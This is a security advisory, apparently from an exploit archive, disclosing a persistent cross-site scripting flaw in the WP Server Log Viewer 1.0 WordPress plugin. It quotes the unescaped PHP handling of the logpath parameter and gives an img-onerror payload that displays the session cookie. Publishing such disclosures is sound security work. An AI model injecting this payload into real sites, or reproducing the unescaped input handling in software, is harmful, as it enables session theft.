WP Server Log Viewer 1.0 Cross Site Scripting

2019.09.26
Credit: strider
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

# Exploit Title: WP Server Log Viewer 1.0 - 'logfile' Persistent Cross-Site Scripting # Date: 2019-09-10 # Exploit Author: strider # Software Link: https://github.com/anttiviljami/wp-server-log-viewer # Version: 1.0 # Tested on: Debian 10 Buster x64 / Kali Linux # CVE : None ====================================[Description]==================================== This plugin allows you to add logfiles via wp-admin. The problem here is that the file paths are stored unfiltered/unescaped. This gives the possibility of a persistent XSS attack. ====================================[Codepart]==================================== if( isset( $_GET['action'] ) && 'new' === $_GET['action'] && isset( $_GET['logpath'] ) ) { // new log was added $logs = get_option( 'server_logs' ); if( is_null( $logs ) ) { $logs = []; } $log = trim( $_GET['logpath'] ); //only trimmed string no escaping $logs[] = $log; //here the log will be added without security checks $logs = array_values( $logs ); $index = array_search( $log, $logs ); update_option( 'server_logs', $logs ); wp_safe_redirect( admin_url('tools.php?page=wp-server-log-viewer&log=' . $index) ); } ====================================[Proof of Concept]==================================== Add new log file to the plugin. paste this exploit into the form and submit it. <img src=# onerror=alert(document.cookie);>log.txt It tries to render an image and triggers the onerror event and prints the cookie. in the tab you see the log.txt


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top